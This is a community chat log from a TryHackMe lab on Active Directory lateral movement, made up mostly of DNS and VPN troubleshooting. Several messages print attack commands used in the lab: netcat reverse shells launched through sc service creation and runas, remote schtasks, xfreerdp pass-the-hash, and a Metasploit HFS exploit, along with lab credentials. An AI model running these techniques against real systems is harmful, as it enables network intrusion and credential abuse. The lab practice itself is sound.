#lateral-movement-and-pivoting
did you set it under /etc or /etc/systemd
Yeah, did everything as mentioned. Doesn't seem to work for me.
Are you using the attackbox or your own machine?
Dont forget to check out /etc/resolv.conf
Adjusting that config file helped my dns issue
More than likely it's set to nameserver <your VM subnet GW>
Can someone vote a reset for the 10.200.71.101 network, please
once again
thnx
Gents, last task for the room, port 7777 is already in use on the AttackBox, you need to change it to a free port
And ladies of course
and everyone else playing the room
Oh man, your role colour is throwing me off
Where is your level!?
I think it is GOD mode…
How do I connect to this room? Running nslookup thmdc.za.tryhackme.com 10.50.49.139 says: ;; communications error to 10.50.49.139#53: connection refused
```
└─# cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 10.50.49.139
search 10.50.49.139
search 8.8.8.8
```
you have to use the DC IP (something like 10.200.x.101 at the top of the tree diagram) rather than your own THM IP
like this
```
└─# cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 10.200.51.101
nameserver 10.50.49.139
search 10.50.49.139
search 8.8.8.8
```
remove that nameserver line of your own ip :)
thanks its working now ^^
can you cat /etc/resolv.conf
Sure, thank you for the reply
Sometimes I can connect but then I get broken pipe
I think I figured it out, maybe you can only have one VPN connection open to the network?
Since I turned off the connection from my local machine it seems to be working fine
Yes, and the VPN config pack is exclusive to that room.
To connect to a machine via WinRM, do we need to add the user to the local Administrators group on the target PC, or will it work even if the user is added to a different local group?
Currently trying out other ways listed in task 4 and cannot seem to get scheduled tasks to connect back remotely. I am doing the following:
```
schtasks /s 10.200.51.201 /run /TN "legitTask" /u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever
```
By default, any user of the "Remote Management Users" will be able to WinRM into a machine. Administrators are also allowed to do so.
Could you try with the following command
The part of the command you are trying to run shouldn't include the "<>" characters. /tr "C:\tools\nc64.exe...."
thank you mudra I really appreciate that, was banging my head against the wall yesterday
I managed to fix my connection issues just ended up getting stuck trying the other methods
That is required for RDP i guess
Yeah I misunderstood it then
Although I can see there is a different group which is used for WinRM access.
"The WinRMRemoteWMIUsers_ group allows running Windows PowerShell commands remotely whereas the Remote Management Users group is generally used to allow users to manage servers by using the Server Manager console."
https://social.technet.microsoft.com/Forums/lync/en-US/de8c6dba-955f-4e1a-ae7a-7d85dde3e5b3/winrmremotewmiusers-vs-remote-management-users?forum=winservermanager
There's a couple of ways to go about it, I think. There's some more info about how access to WinRM works on the Windows Local Persistence Room (task 2) in case you are interested: https://tryhackme.com/room/windowslocalpersistence
Am I the only one who has problems with setting DNS on the AttackBox?
Even after using "systemctl restart systemd-resolved"
I even terminated the AttackBox machine and started it again...
try the pinned message solution
it should work in case the attackbox is being funny
;; connection timed out; no servers could be reached
After trying nslookup thmdc.za.tryhackme.com
Should I wait for some time?
What's your assigned THMDC IP address?
10.200.75.101
That network seems to be down
can you make sure it is started, and if so send a reset for it
It started:
Network state: Running
So, what should I do?
now the IPs are up
the servers should take around 4 mins to start
and then all should be working fine
Yes, I saw it now after refreshing web page. I started it now. Should I let you know if all is OK? Btw, thanks!
You shouldn't have any further issues, hopefully, but feel free to write if you do
Okay, big up!
Why does this service not run in the background?
```
sc \\thmiis.za.tryhackme.com create shell binPath="C:\Temp\nc64.exe 10.200.51.249 -e C:\Windows\System32\cmd.exe 4242" start=auto
sc \\thmiis.za.tryhackme.com start shell
```
... Cmd is now blocked ...
AFAIK, services are supposed to run in the background context
Pretty sure nc64.exe is not a service binary. Remember for services it actually waits for a flag from the binary to tell it that everything is okay. If that flag is not received, it will terminate the service. Since nc is not a service binary and no flag, service will fail. Why that kills your terminal is a mystery to me
What do you mean? Are you getting a visible shell?
because in the task room it says we need to create a service binary otherwise it will exit after execution right?
Nope, the service is running non interactively but was blocking the cmd
anyways I got the answer, also I am not fully going through the description, rather exploring it on my own
Can someone submit reset request? I can connect to the SSH but same credentials are not working for RDP
What is the problem with networks on THM? Specifically, Pivoting and Lateral Movement AD. The network is constantly UP and DOWN. I need to reset 10 times in 10 minutes
And in the end, it ends with the network being down again..
Doing anything is useless, because it falls down every 20-30 secs after restarting it.
Hello, does anyone know if it's possible to do the other methods explained on task 3? I've tried using psexec and it doesn't seem to work.
yeah its possible to use psexec
ok thank you, I will try to find out what's wrong
if you struggle too much try showing the command you are using
Hey there, I'm sorry you are experiencing these issues. If the network problems persist, feel free to DM me so I can check what might be happening.
I used c:\tools\PsExec64.exe -u za.tryhackme.com\t1_leonard.summers -p EZpass4ever \\thmiis.za.tryhackme.com -i cmd.exe
Keep getting this error... Is this okay?
Not necessarily an error I guess, it's just that this should be resolving to the THMDC ip
I already set up the DNS config and restarted NetworkManager
Exact same setup (except different DC IP) worked in previous AD rooms (enumerating and breaching AD)
Can you cat /etc/resolv.conf
?
In your case, nslookup is trying to resolve using 1.1.1.1
it may work for you if you just erase the rest of entries there
Yes, but 1.1.1.1 is for internet access. Also, it falls back on 1.1.1.1 after it's determined that the DC doesn't offer recursion.
That makes sense
Like I noted earlier, in the previous 2 rooms, nslookup worked as expected. Possibly this room's DC is configured slightly different?
Yes it is
Ahh
may I know what I should do to get the flag on task 3?
I'm getting this message after I execute flag.exe:
Sorry! You are still missing something. No flag for you yet. (1)
This means you are probably using the wrong user to access the flag
are you connecting as t1_leonard.summers to THMIIS?
yes
Just to make sure, could you send me a screenshot of the last commands you ran?
You can DM it to me
What's going on?
But other AD networks like Enumerating AD and Breaching AD can connect successfully
Can you try regenerating your connection file?
Openvpn endpoint
Can you DM me to check this?
Ok
Having an issue with the connection now
According to the access page I'm connected to the VPN, but now I cannot connect to any of the hosts, as can be seen in the screenshot of the Kali VM
Everything was working just fine about 30 minutes ago and while I was typing out the runas command in Task3, I got a broken pipe
you can see that it doesn't use the correct DNS to lookup, can you try and remove the 2 other nameservers?
tried already
or just restart your dns
that too
tried turning it off and on again?
and how does your network look like, is it running? (shows on the page)
hmmm
It seems to still try to resolve the DNS name at 1.1.1.1 and not the actual DC. What happens if you do nslookup thmdc.za.tryhackme.com 10.200.51.101?
Can't test it now, but on a related note, I couldn't access any of the other machines on the network (cred distributor, thmjmp...)
Yeah if DNS doesn't work, nothing will work. But that command will tell me if it is your DNS configuration or the network having an issue
@shadow linden I'm walking through the machine again and the permissions for Leonard seem to be broken
executing:
for the shell to then use services
chances are you mistyped the password
runas won't do any checks to see if the password is correct because of the /netonly flag
so if your password is wrong, you should get access denied afterwards
in any subsequent command that actually tries to use the credentials
I was using a lower case z in the password, you got me
That happens to me a lot as well 🥲
I fat finger most things
hello, noob question. May I know what I am doing wrong with task 7? I'm getting this error with metasploit.
```
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit
[-] Handler failed to bind to 127.0.0.1:7777:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (127.0.0.1:7777).
[*] Exploit completed, but no session was created.
```
that means port 7777 is already being used by some other service in your machine
so just change the port number you are using and that should work
you can check who is using the port currently with ss -lpunt
you need to be root to see the name of the process attached to each port though
thanks @shadow linden ! It worked. Finished the network/room
Congrats!
thanks!
Now it's working fine. must've been a hiccup somewhere hahah thanks for trying to help
Having some trouble with the Tunneling Complex Exploits section. When I try to create the tunnels, I get an error saying that my machine (attacker machine) port 22 is refusing connections. I'm not sure what to do to fix this. I started a listener on port 22 on my machine (attacker), which seems to allow the tunnel to work, but when I run the exploit in metasploit, I get a message saying that the exploit has run but no session was created. Anybody able to lend a hand?
omg didn't even pay attention, the ssh service is disabled by default on my vm
Good day,
I am new to THM; most of my time has been spent on HTB. This is my first experience using DNS in an online platform like this, and this lab has been a horrible experience as DNS keeps failing.
I have tried both the online attack box and my local Kali instance, both with the same result. I have had the best luck with the online attack box though. I have been trying to complete task 3 for 2 days now. DNS will work and then halfway through the lab it fails to resolve FQDNs. I have restarted "systemd-resolved" many times and did a dig on the domain "za.tryhackme.com" with negative results.
In an attempt I was pretty sure wouldn't work, I placed the respective IP/FQDN in /etc/hosts, but as expected it didn't work.
These labs would be quite good, but DNS is more than raining on this parade.
It would make the lab experience better if you could reboot/revert machines without 5 votes. That way the issue would be temporarily fixed till DNS failed again. But at least the user could solve the issue rather quickly.
Also, I had tried the labs on another computer to make sure it wasn't my PC causing the issue.
Any thoughts @shadow linden?
I've been having this issue too, especially today. It's been temperamental before but today it just isn't connecting to the DNS. Restarted the network and still having the same issue on a few devices
Thanks for your feedback.
Possibly needs checking by @shadow linden if they're free, doing the same as I've done on the first two rooms for this network but no result 😦
By golly it is working....but for how long lol
Now I am getting "broken pipe" errors on THMJMP2 port 22. 😦
Whilst you're executing commands on SSH?
Ya. Can't type more than a word and then the pipe breaks
I think I will put a nail in this coffin for today, or at least till we hear back from the THM staff. Wasted WAY too much time on this, very disappointing.
Hope you have a good day!
You too
Hey @lilac hedge, I'm sorry you were having these issues. As far as any reports we've had, the main problem is mostly the attackbox client-side configuration not sticking for some reason. If you are using the attackbox, there is a pinned solution that should work a bit better for you. If using your own machine, I'm more than happy to provide any support if needed, but that will depend on the specific OS you might be using. The DNS server has been working fine (as far as I've seen), but if you feel it might be responsible for the issues you are facing, please send me some additional info so I can try to pinpoint the problem.
Regarding the SSH broken pipes, maybe you are using THM's VPN on top of some other VPN like ExpressVPN or the like? This sounds like an MTU problem that may arise if doing so.
Good day @shadow linden,
Thanks for your response. I really enjoy your lab content and once I get the lab DNS under control the experience will be complete. Thanks for putting the content together for us.
I will test today, but yesterday when using the THM Attack Box if I ran the cmd "systemctl restart systemd-resolved" x 2 (twice) DNS would work again. If it stopped working at some point I used the same technique to be able to resolve FQDNs again. Hopefully this will be a workaround for me and maybe for others. I will also check out the pinned solution you mentioned.
In respect to the broken pipes, I am not employing another VPN on top of the THM VPN. After taking a break from the labs for a bit the issue went away and hasn't returned so far. 🤷
Have a great day. Cheers.
Let me know if any issues persist. Feel free to DM me about it and I'll do my best to reply fast so we can check together
This should be a solid way to configure the DNS on the attackbox. Let me know if this improves anything.
Much appreciated
Yes! Works like a charm. Thanks @shadow linden
Hi guys, I'm facing a problem where I am able to upload a reverse shell .php to a Dolibarr CMS. When trying to execute the file, it is downloaded instead of executed. Help needed on this
TBH the worst rooms THM created are the AD ones; all of them have VPN connection issues
Is anyone working right now for the lateral-movement room?
Is it working at all?
I can not even ping THMDC
Hey there, glad to help you with that. Can you DM me so we can check what might be happening?
I sent you a friend request
Hello guys could you do me a favor to reset the room we need two more vote
Hi! When trying to use .msi files on the IIS, I'm getting this error:
Do I have to reset the network?
you need to replace TARGET with the machine you want to move to
@shadow linden hi, maybe you can update this part and include a link.
thank you @shadow linden
Link added for you.
cool. I didn't ask specifically for myself, for future students. thanks
Hello! I'm a bit stuck at Kerberos but I have literally no idea why... Does anyone know what's wrong in what I'm trying to do?
||I've tried with the last digit and without, but I don't think the thing is there||
@shadow linden hello, I have set my DNS server to the DC in /etc/resolved.conf and also started the services, but when I do nslookup on the DC it shows an error like this: ;; Got recursion not available from 10.200.64.101, trying next server
Having a hell of a time with DNS in task 1. I'm using my own Kali attack VM. I've got green checks on the connection tab to the Lateralmovementandpivot VPN server and the DNS in NetworkManager was appropriately set to 10.200.75.101. I can ping this IP address but when I nslookup thmdc.za.tryhackme.com, I get:
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
The server it's using is 192.168.57.2, which is not the DNS specified in NetworkManager. When I look at all the interfaces that are up, that one matches my eth0 IP instead of lateralmovement. Anyone with any ideas or additional troubleshooting steps?
I moved on to using the built-in Ubuntu attack machine and DNS seems to be fine in here. I'll continue this way.
Run the CMD and then use the flag
I am not able to get the reverse shell as the t1_toby.beck user. This is the PTH command
Also the following command is giving me the account restriction error
xfreerdp /v:thmjmp2.za.tryhackme.com /d:za /u:t1_toby.beck /pth:533f1bd576caa912bdb9da284bbc60fe
Can someone allow this user to login via RDP? Need to take a few screenshots as PoC
The login is negotiated while in the netonly process, therefore get the reverse shell and use winrs
I am not able to hijack the session of the t1_toby.beck user. Anything I am missing?
Hey there, this is expected and won't bother you on doing the room. Even if nslookup complains about it, you should be able to do the rest of the room without a problem
Are you running your cmd.exe as SYSTEM? If you aren't SYSTEM, tscon will ask you for the user's password
As an administrator user
tier 2 admin
that won't be enough
you need to psexec into SYSTEM before attempting RDP hijacking
Ah so psexec for system. got it
Wondering if we can use runas for system user or psexec is required
I don't think you are allowed to runas as SYSTEM, but I might be wrong
I'd guess runas will probably throw an error on it, or just ask you for a password.
hmm, can't connect to the network on my VM. File regenerated, no IP displayed for the VPN, but ip a shows that I'm on the network. resolved.conf is good, why is it not working? (working fine with attackbox)
thx
if you refresh the page does the network show as started? and can you show a screenshot of ip a
Wait, are you using kali and the attackbox at the same time? If so, the attackbox auto-connects with the same vpn config, which will cause connection issues as they disconnect each other
I have tested first with my VM
let me kill the attackbox
and with this first test nothing, then tested on the attackbox and then working
I still have nothing
can you kill the openvpn process, check there aren't any others running when you ip a then restart it. Then try to ping the domain controller?
on it
also, what subnet are you in?
Subnet 64 is working
thmdc 10.200.64.101
can you ping it?
are you following the kali or the attackbox method for setting dns?
kali for the VM and the other for attackbox
the edit connection method, not directly editing resolved.conf
you might need to just run sudo systemctl restart NetworkManager twice? sometimes that does it for me
If that doesn't work, Kali might be prioritizing your local DNS over the one in the network
in that case, you'd have to manually edit resolv.conf and delete any DNS that isn't THMDC
or at least set the THM one as the first one
will try in a sec
if you send us a capture of nslookup thmdc.za.tryhackme.com we can be sure of what DNS is being taken into account
THM is in first position
(no issue, well, not as many issues as for the other networks ;))
chances are you are set up already. Can you try opening http://distributor.za.tryhackme.com/creds on your browser?
nslookup isn't playing nicely with that network, but the rest should probably work
Try running the nslookup command as root.
wtf ^^ @shadow linden I can connect ^^
Yeah... nslookup is just ignoring the DNS, but other programs should work OK with it
@feral granite
you can do the room that way
at long last
just don't mind nslookup
thx @lilac kite and @feral granite
When I did the final room, nslookup would only work for me as root
well, if we are unable to manage this kind of situation, let's change hobby. THX ALL!
well, that's an interesting one...
^^
Apparently this is a known thing with the way nslookup deals with the very specific setup where you have more than a DNS server configured, and the first one doesn't have recursion enabled https://github.com/coredns/coredns/issues/3835
thx !
Hey @shadow linden are there any labs for mssql abusing on thm?
I recommend using the search feature on the site
Yes, but unfortunately it lacks basic features + I have now set it up on my infra. Thanks for your help
Can I get some help with the HOLO network? I am at task 36. For some reason mimikatz won't run properly. I do have what I did documented. Any help
would be great. I wanted to create a shell but have some questions about the chisel setup on my client
Try at #holo-network
I'm using the attackbox but can't reach http://distributor.za.tryhackme.com/creds. Also had to add the DNS to resolved.conf. I do see lateralmovement under network interfaces
and can't ping thmdc.tryhackme.com either
Is it .loc in this one?
Nope, wrong one, ignore that.
If you can't ping the IP, it's possible the network isn't running. Refresh the page and click the start button. Also what subnet are you in?
I can ping 10.200.51.101 (dc), I can't ping by name. Tried removing the DNS and spawning a new attack box. But can't ping by name thmdc*****
And you've done the systemctl restart thingy command? Sometimes that needs to be run twice to get things going 🤷‍♂️ failing that you could edit /etc/resolv.conf directly and it should work, but know that the attackbox will revert your changes after some point, so you'll have to remake them.
It might also be a good idea to run ip a and if you have multiple 10.50 addresses, leave the previous AD networks you've likely recently completed (leaving them doesn't reset progress), and then when you restart your attackbox it'll only be connecting to one VPN profile (it auto connects to your openvpn network profiles)
will give it a go ... i will get back to you later have to go .. Thank you so much for the help @lilac kite
I might not be around later today, but someone will be
I have the same problem as other people
I cannot resolve
Can you try navigating to http://distributor.za.tryhackme.com/creds ?
if it works, then you can just ignore nslookup and continue with the rest of the room
strange?
nslookup is being weird. It seems to be an expected behaviour for this specific setup
the room should work though
Just don't mind nslookup. Other tools shouldn't behave that way
there is a problem as I can not connect to the VPN
is there a support person to look into this issue?
I can look into it, but it would seem you are already connected from the previous images
not anymore
I got disconnected and cant connect again
I am just rebooting my Kali to take that out of the equation
alright. If that doesn't work, just send a screenshot of the error you are getting and I'll check
by any chance, are you also running the attackbox on the website?
can you DM me to continue checking on this?
!vpnscript
Might be worth @rose kernel and yourself adding a note to say something like "Note: occasionally nslookup will fail, but you can still resolve the links in question, in this case, you can continue with the room."
Or add dig as an alternative to nslookup?
I'll update the room in a bit
Anyone else having issues getting the reverse shell in task 3 via the runas command? It looks like it's executing on the THMJMP2 terminal but I don't receive anything on my NC listener
Are you getting any errors?
```
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443"
Enter the password for ZA.TRYHACKME.COM\t1_leonard.summers:
Attempting to start c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443 as user "ZA.TRYHACKME.COM\t1_leonard.summers" ...
```
Not seeing any errors 😦
lol
if you manually run c:\tools\nc64.exe -e cmd.exe 10.10.192.173 4443, does it work?
one sec ... i'll try it
it does not, it hangs for a bit, completes, and then nothing on the listener still
maybe someone else replaced the nc64.exe executable?
can you try nc64.exe -h?
it should at least show the help
yes it does
can you ping your DC from the attackbox?
maybe it disconnected
all you are doing should work
I can ping the IP, and FQDN of the DC
I'm going to take a break to grab some lunch, and restart my attack box etc. and start from the beginning. If I run into the same issue I'll ping you again
alright!
thanks @shadow linden ... i really like the way the room is laid out though!
I just realized what is happening. When executing nc.exe, you are using the attackbox's eth0 IP address. You have to use the IP address on the lateralmovement interface, which you can get with ip add show lateralmovement.
The vulnerable network can't reach your eth0 on the attackbox, so you get nothing.
This makes sense, thanks i'm going to give it another try now
It's totally in the instructions on task 1 ... that i totally didn't skip over ... lol
Glad it works now!
again appreciate your help, thanks @shadow linden
got through the whole room, just getting hung up on the last thing with rejetto, and it's probably because I'm making a mistake
Ah. I just finished this lab today; if you follow the steps for forwarding verbatim, you should find success
Yeah i just realized my mistake, in metasploit i was setting the srvhost instead of the srvport
Nice, it happens 🤷‍♂️
Yup got it. woo
Huzzah!
You mean with the user you are getting from the distributor?
could you send a screenshot of the command and the error?
Did you try changing the tunneluser's password?
yes, the command will hang there until you close it
is there some trick to getting the network back up successfully? was working moments ago and it shut off. I hit start, and it's now 10 minutes and still nothing seems up.
I will try the attackbox.
Try refreshing your browser. Sometimes the website gets stuck showing the network as started when in reality it has been stopped.
Oh, that says it's up. I just don't have connectivity to any services.
next time it's up I'll see if pings work, just because that's quicker testing.
hello, I have an issue with the Lateral Movement and Pivoting room: I can't connect to the DC http://distributor.za.tryhackme.com/creds. help plz
Have you sorted the resolv.conf?
yep
I have the same issue as 3RB
Hello mate, please I need help with lateral movement task 7 Tunneling complex exploits. The "putting the whole command together" part is confusing and I'm having a hard time getting over it. Am I supposed to ssh using the username I log in with, by replacing tunneluser@attacker_Ip? If not, I keep getting prompted to input a password after the initial command. What am I doing wrong? Need some help, thanks
now i have this error MOZILLA_PKIX_ERROR_SELF_SIGNED_CERT
same as the other AD network rooms, the network is unstable, it is impossible to do the room
using the attackbox:
```
root@ip-10-10-157-29:~# nslookup thmdc.za.tryhackme.com
Server: 127.0.0.53
Address: 127.0.0.53#53
Non-authoritative answer:
Name: thmdc.za.tryhackme.com
Address: 10.200.51.101
root@ip-10-10-157-29:~# nslookup thmdc.za.tryhackme.com
Server: 127.0.0.53
Address: 127.0.0.53#53
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
```
sometimes resolving works, 15 sec later it doesn't work
Hi!
Hmm, someone else has encountered this.
Task 4 Moving Laterally Using WMI
I did everything as in the task point by point.
Got a shell.
But the exe file with the flag refuses to run.
Sorry! You are still missing something. No flag for you yet. (7)
It was done this way on purpose))
==========
It's all good.
A strange glitch.
At the end of the day, I did all the same operations again and the flag was displayed without an error.
Hi all, are you able to get creds from http://distributor.za.tryhackme.com/creds? I updated the resolv.conf, and get nslookup for the domain access.
And are you getting the creds?
no, it gets the site not found:
Can you ping distributor.za.tryhackme.com?
And could you run ip a ?
@lilac kite, finally, I got the same trouble as in the enumerating-ad network room.
I exited the other network room and I got the same trouble.
```
# nslookup thmdc.za.tryhackme.com
Server: 127.0.0.53
Address: 127.0.0.53#53
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
```
Around every ~1 or 2 min, nslookup fails.
I had to systemctl restart, then 2 min later, it fails again.
```
# systemctl restart systemd-resolved
# nslookup thmdc.za.tryhackme.com
Server: 127.0.0.53
Address: 127.0.0.53#53
Non-authoritative answer:
Name: thmdc.za.tryhackme.com
Address: 10.200.64.101
# nslookup thmdc.za.tryhackme.com
Server: 127.0.0.53
Address: 127.0.0.53#53
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
link/ether 02:5e:46:43:4d:c7 brd ff:ff:ff:ff:ff:ff
inet 10.10.12.158/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::5e:46ff:fe43:4dc7/64 scope link
valid_lft forever preferred_lft forever
3: lateralmovement: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
link/none
inet 10.50.61.129/24 brd 10.50.61.255 scope global lateralmovement
valid_lft forever preferred_lft forever
inet6 fe80::420e:995c:8b00:ade5/64 scope link stable-privacy
valid_lft forever preferred_lft forever
4: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:5b:0b:b7:40 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:5bff:fe0b:b740/64 scope link
valid_lft forever preferred_lft forever
6: veth943a3aa@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether e6:65:6d:60:9e:99 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::e465:6dff:fe60:9e99/64 scope link
valid_lft forever preferred_lft forever
8: veth3251118@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 4a:97:f5:05:d1:dc brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::4897:f5ff:fe05:d1dc/64 scope link
valid_lft forever preferred_lft forever
```
can the user_flags be deleted? I think someone has deleted the flag of Leonard.summers
it says the flag will be found under Leonard's Desktop after running flag.exe but I didn't find the flag.exe:
```
Directory of C:\Users\t1_leonard.summers\Desktop
06/15/2017 06:29 PM <DIR> .
06/15/2017 06:29 PM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
2 File(s) 1,081 bytes
2 Dir(s) 8,380,841,984 bytes free
```
are you sure flag.exe isn't somewhere else? it reads to me like you run flag.exe, which will then generate a flag.txt in the directory you're in. @tiny bramble
Anyone run into issues when receiving the shell at the end of task 3 from THMIIS? I get the connection when starting the services of the uploaded exe. But if I try to type anything like "hostname or whoami" the shell closes.
It looks like it may be because the msfvenom .exe running on the port 4444 we started won't stay running after starting it. sc query shows it in the stopped state if you check right after.
well nvm, it's staying open now.. I see bidirectional traffic in wireshark between my VPN IP and thmiis.... but the shell gets no returns, it's just blank, I guess I'll try stabilizing it
sigh @dry summit ⬆️
Cheers!
Is that from the Attackbox or your own machine? and did you sort it?
@lilac kite, all commands from the attacker box, whole result, not sorted
Hmm, not sure at the moment, I'll check it out later
haha no need to sigh just yet. attempts to stabilize had no change... 😦
oh that was not targeted at you.... it was for another user posting some rule breaking stuff and getting it removed
oh sorry ha
no problem
no worries tho
root@ip-10-10-47-173:~# systemctl restart systemd-resolved
root@ip-10-10-47-173:~# nslookup thmdc.za.tryhackme.com
Server: 127.0.0.53
Address: 127.0.0.53#53
** server can't find thmdc.za.tryhackme.com: NXDOMAIN
Unable to resolve name with THMDC
Able to ping 10.200.64.101 though
Running from AttackBox
Hi guys, I cannot connect to the lateral movement network. I used the attackbox kali vm and my own machine and neither of them connected to the network
have you tried leaving and rejoining the room then regenerating your vpn file for said network.... wait 5 mins then download it again
Regenerate vpn
add dns DNS=<THMDC 10.200.51.101>
restart services
still there is no connection
And it's been about 5 minutes of the network trying to reset but it looks like it's stuck
oh okay then that is not the cause of your problem
thought it might have been the standard vpn issue
but that seems like another problem

@bronze flame hello admin is there any problem in lateral movement lab? Network status stuck at resetting
doubt hydra can help but jabba might be able to as they are thm staff
what is jabba username? I coulnd't find it
@azure bronze
Hi that's me
Hey could yo please help me with this problem?
by the way thanks for response
Gave +1 Rep to @azure bronze
Drop me a DM:)
Hey there, there is a known issue with nslookup in the lab. Can you try just navigating to http://distributor.za.tryhackme.com/creds ? If the site works, then you are connected and good to go with the rest of the room.
if the website doesn't work, check the pinned message in this channel for a solution on getting your DNS configured properly
it's for the lateral movement and pivoting and the rdp connection cert keeps on ignoring
```
┌──(root㉿kali)-[~]
└─# xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_jessica.richards /p:o6R9PfosU /cert-tofu
[13:56:00:101] [11899:11900] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
```
ping is working
```
┌──(root㉿kali)-[~]
└─# ping thmdc.za.tryhackme.com
PING thmdc.za.tryhackme.com (10.200.64.101) 56(84) bytes of data.
64 bytes from 10.200.64.101 (10.200.64.101): icmp_seq=1 ttl=127 time=418 ms
64 bytes from 10.200.64.101 (10.200.64.101): icmp_seq=2 ttl=127 time=630 ms
```
but the creds site is not responding
```
Hmm. We're having trouble finding that site.
We can't connect to the server at distributor.za.tryhackme.com.
If that address is correct, here are three other things you can try:
Try again later.
Check your network connection.
```
the DNS has been configured correctly like I did for the other AD rooms too, but this one isn't working now, it did before
ok thanks
Gave +1 Rep to @shadow linden
the server is up and running
all I can think of are issues with your browser cache not updating
if you do curl -v http://distributor.za.tryhackme.com/creds what do you get?
┌──(root㉿kali)-[~]
└─# curl http://distributor.za.tryhackme.com/creds
curl: (6) Could not resolve host: distributor.za.tryhackme.com
can you DM me so we can check
ok
I'm on day 3 of a vpn connection loop for lateral. Not sure what to try to fix. I have left the room, regenerated and redownloaded the config, waited for a network reset. Anything else I should try?
hey there, can you DM me to check
Big shout out to @shadow linden for this room. Really well done and easy to follow. Great explanation on the Port Forwarding section. The Tunnelling Complex Exploits section was really cool and well explained.
hey folks, I've been struggling with this room for 2 evenings in a row now, I can't seem to connect to the DC.
I use the command mentioned in the intro systemd-resolve --interface lateralmovement --set-dns 10.200.51.101 --set-domain za.tryhackme.com . After that, the creds page is timing out, nslookup thmdc.za.tryhackme.com is timing out too etc. I'm using the THM Attack Box. Suggestions greatly appreciated.
Hey there, make sure the room's network is started from the website. Refresh the page to check the current status just in case.
Hey @shadow linden , thanks for the suggestion, it's currently listed as running; uptime 23m.
Gave +1 Rep to @shadow linden
that's weird... Let me check if the network is working as expected then
the network is down from my end
if you refresh the website and it still appears as started, then you may need to reset the network
that's very weird, it's definitely showing up as active and running in my browser, I've also just extended the time. I've also clicked the reset button, it's currently sitting at 3/5 votes for what it's worth.
A reset should do. You can also vote again for a reset after an hour, which should help speeding up the process
Lol it's cool how yall know all these stuff 💯
gotcha, thanks, I'll try that, though I will say I had the exact same issue yesterday evening with the DC with the exact same IP so my gut tells me it might be just that DC or so. But I'll do as advised, thanks.
Gave +1 Rep to @shadow linden
I'll send a word to support about this just in case. If the reset doesn't solve it let me know and I'll have them take a look
hey @shadow linden I can confirm the issue is resolved after a network reset, thanks again.
Gave +1 Rep to @shadow linden
That's great! 🥳
Anybody got a hint for what is needed to run the flag.exe? keeps saying you're missing something no flag for you. 😦 lol
Who is active in network?
creds website doesnt open . nslookup returns ip of dc but I couldn't get creds
Hey there, what network are you in? (10.200.x.0)
I'm stuck at beginning
can you try doing nslookup distributor.za.tryhackme.com?
that isn't right...
what seems to be problem?
the IP you are getting is wrong. Someone probably messed with the DNS config
You need to reset that network through the website
I did it
did you get the required 5 votes?
yup. Network was reset 10 minutes ago
I'll have a check at it then. That's very weird
And also I cant connect to the network over my own kali machine. Vpn stuck always at resetting.
It would be great
This happens if you open the attackbox and try to connect from your machine at the same time, because they fight to connect using the same vpn profile
Hmm. okay I'll check again
Anyone who have 10.200.51.X can help me restart network ? (2/5)
Problem with 10.200.51.X after reset network( i can't connect to any machine)
Hey there, did you try regenerating the ovpn file from the website?
Yep
can you ping any of the hosts in the network?
Yes
I tried on my kali and the attack box after configuring dns on the attack box
if you can ping, then it might be an issue with your dns configuration. Can you try running nslookup thmdc.za.tryhackme.com 10.200.51.101 and send a screenshot of the output?
I didn't change any dns setting + it was working perfectly last night
When start PC I will take a screenshot with command output
alright!
You are probably set to go. Try to navigate to http://distributor.za.tryhackme.com
it should work
Nope, don't work
can you DM me so we can check?
Problem persists after a few restarts of the network
Did anyone solve task6?
Hey guys, i assume the network is no longer working
at least on my side
even though i configured DNS, i can't navigate to http://distributor.za.tryhackme.com/
i can't even ping the domain controller
but i can ping THMJMP2
Is the problem only on my end or is it for everyone?
What network are you on? (10.200.x.y)
Help
i can't connect VPN lateral-movement...
i can Solve
Replace the cipher AES-256-CBC line in your .ovpn config with data-ciphers AES-256-CBC
any idea why systemd-resolve is not found on Kali?
```
└─# systemd-resolve
systemd-resolve: command not found
```
There are separate instructions on configuring your DNS in Kali environments in the room. I'm not sure if Kali ships with systemd-resolved
vote reset plz thmjmp2 is not accepting either ssh or rdp connections
Please specify what subnet you're in when this happens. You should also ping the machine to confirm if you have a stable vpn connection
sorry but a reset took place, solved the problem, can't verify that for you now
hi anyone completed Exploiting Kerberos Delegation?
hi anything wrong w THM
